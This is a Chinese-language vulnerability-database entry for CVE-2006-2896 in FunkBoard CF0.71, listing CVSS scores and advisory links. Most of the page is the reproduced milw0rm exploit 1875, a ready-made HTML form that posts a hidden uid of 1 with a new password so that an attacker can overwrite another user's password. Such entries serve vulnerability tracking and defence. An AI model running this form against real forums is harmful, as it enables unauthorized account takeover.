CVE-2006-2896
CVSS5.0
发布时间 :2006-06-07 06:02:00
修订时间 :2011-03-07 21:37:15
NMCOE    

[原文]profile.php in FunkBoard CF0.71 allows remote attackers to change arbitrary passwords via a modified uid hidden form field in an Edit Profile action.


[CNNVD]FunkBoard CF0.71 profile.php 权限许可和访问控制漏洞(CNNVD-200606-163)

        FunkBoard CF0.71中的profile.php允许远程攻击者通过在一个编辑概要文件操作中的隐藏表格来修改任意密码。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2896
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2896
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-163
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/20433
(VENDOR_ADVISORY)  SECUNIA  20433
http://www.vupen.com/english/advisories/2006/2158
(UNKNOWN)  VUPEN  ADV-2006-2158
http://www.securityfocus.com/archive/1/archive/1/435987/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060605 FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit
http://milw0rm.com/exploits/1875
(UNKNOWN)  MILW0RM  1875
http://xforce.iss.net/xforce/xfdb/26912
(UNKNOWN)  XF  funkboard-profile-password-modification(26912)
http://www.funkboard.co.uk/forum/thread.php?id=302
(UNKNOWN)  CONFIRM  http://www.funkboard.co.uk/forum/thread.php?id=302
http://securityreason.com/securityalert/1066
(UNKNOWN)  SREASON  1066

- 漏洞信息

FunkBoard CF0.71 profile.php 权限许可和访问控制漏洞
中危 未知
2006-06-07 00:00:00 2006-06-08 00:00:00
远程  
        FunkBoard CF0.71中的profile.php允许远程攻击者通过在一个编辑概要文件操作中的隐藏表格来修改任意密码。

- 公告与补丁

        

- 漏洞信息 (1875)

FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit (EDBID:1875)
php webapps
2006-06-04 Verified
0 ajann
N/A [点击下载]
<!--
Change action="http://profile.php" under the <form tags> /str0ke
-->

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><form enctype="multipart/form-data" action="http://profile.php" method="POST" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page.\nAre you sure?&quot;);">
<table cellspacing="1" cellpadding="2" border="0" width="100%">
<th colspan="4" bgcolor="#003366">
<b><span><font color="#FFbb33">Profile</font></span></b>
</th>

<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>User Name</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">

   ajann  </td>
</tr> <tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>Membership Number</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   247  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>First Registered</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   Sat 03 Jun 2006 at 09:20:14 pm  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">

   <b>Last Login</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   Sat 03 Jun 2006 at 09:21:45 pm  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>Number of posts</b>

  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   0  </td>
</tr>

<tr>
  <td bgcolor="#888888" valign="top" width="20%">
   <b>Status</b>
  </td>

  <td bgcolor="#BBBBBB" colspan="3">
   Member  </td>
</tr>

<th colspan="4" bgcolor="#003366">
<b><span><font color="#FFbb33">Entries marked with a * are 
required</font></span></b>
</th>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
<b>User Name</b> <font color="#ff0000">*</font>

  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="rname" value="ajann">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
   <b>Your Name</b>  </td>
  <td bgcolor="#BBBBBB" colspan="3">

   <input size="30" name="realname" value="ajann">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top" width="20%">
<b>Password</b> <font color="#ff0000">*</font>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input type="password" size="30" name="pass" value="8ebOZmF5pe">

  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
<b>Confirm Password</b> <font color="#ff0000">*</font>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input type="password" size="30" name="cpass" value="8ebOZmF5pe">
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
<b>E-mail</b> <font color="#ff0000">*</font>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="fmail" value="">
Hide Email Address?  <input type="radio" name="priv" value="yes">Yes
<input type="radio" name="priv" value="no" checked>No
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Prefered Language  </td>
  <td bgcolor="#BBBBBB" colspan="3">
    <select name="newlang">
       <option value="dutch.flf">dutch</option>       <option value="english.flf" selected>english</option>   </select>
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
    Homepage  </td>
  <td bgcolor="#BBBBBB" colspan="3">
   <input size="30" name="www" value="">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">

ICQ  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="icq" value="">
  </td>
<tr>
  <td bgcolor="#888888" valign="top">
AOL Instant Messenger (AIM)  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="aim" value="">
  </td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Yahoo Instant Messenger (YIM)  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="yim" value="">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Location<font color="#ff0000">*</font>  </td>

  <td bgcolor="#BBBBBB" colspan="3">
<input size="30" name="location" value="asdsadasdasd">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Hobbies/Interests  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="90" name="interebbies" value="">
  </td>
</tr>

<tr>
  <td bgcolor="#888888" valign="top">
Gender (M/F)  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input size="1" name="sex" value="">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Date of Birth  </td>

  <td bgcolor="#BBBBBB" colspan="3">
<select name="dobday">
<option selected>1</option>
<option>2</option>
<option>3</option>
<option>4</option>
<option>5</option>
<option>6</option>
<option>7</option>

<option>8</option>
<option>9</option>
<option>10</option>
<option>11</option>
<option>12</option>
<option>13</option>
<option>14</option>
<option>15</option>
<option>16</option>

<option>17</option>
<option>18</option>
<option>19</option>
<option>20</option>
<option>21</option>
<option>22</option>
<option>23</option>
<option>24</option>
<option>25</option>

<option>26</option>
<option>27</option>
<option>28</option>
<option>29</option>
<option>30</option>
<option>31</option>
</select>
<select name="dobmonth">
<option value="1" selected>January</option>
<option value="2">February</option>

<option value="3">March</option>
<option value="4">April</option>
<option value="5">May</option>
<option value="6">June</option>
<option value="7">July</option>
<option value="8">August</option>
<option value="9">September</option>
<option value="10">October</option>
<option value="11">November</option>

<option value="12">December</option>
</select>
<input size="4" name="dobyear" value="">
  </td>
</tr>

<tr>
  <td bgcolor="#888888" valign="top">
Signature (&lt; 100 characters)  </td>
  <td bgcolor="#BBBBBB" colspan="3">

<textarea name="sig" rows="3" cols="35">   </textarea>
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Use an Avatar ?  </td>
  <td bgcolor="#BBBBBB">
Current Avatar - <input type="hidden" name="avatar" value="No Avatar">

No Avatar   
<input type="submit" name="action" value="Select Avatar"></td>

</tr>
<tr>
  <td bgcolor="#888888" valign="top">
Upload Avatar ?<br>(GIF, JPG or PNG only)  </td>
  <td bgcolor="#BBBBBB">
<input type="FILE" name="userfile" size="35">
<input type="hidden" name="MAX_FILE_SIZE" value="5242880">
  </td>
</tr>
<tr>
  <td bgcolor="#888888" valign="top">

<b>Submit</b>
  </td>
  <td bgcolor="#BBBBBB" colspan="3">
<input type="hidden" name="uid" value="1">
<input type="submit" name="action" value="Edit Profile">
  </td>
</tr>
</tr></table></form>

</body></html>

# milw0rm.com [2006-06-04]
		

- 漏洞信息

26181
FunkBoard profile.php uid Hidden Form Field Arbitrary User Password Modification
Remote / Network Access
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-06-04 Unknow
2006-06-04 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站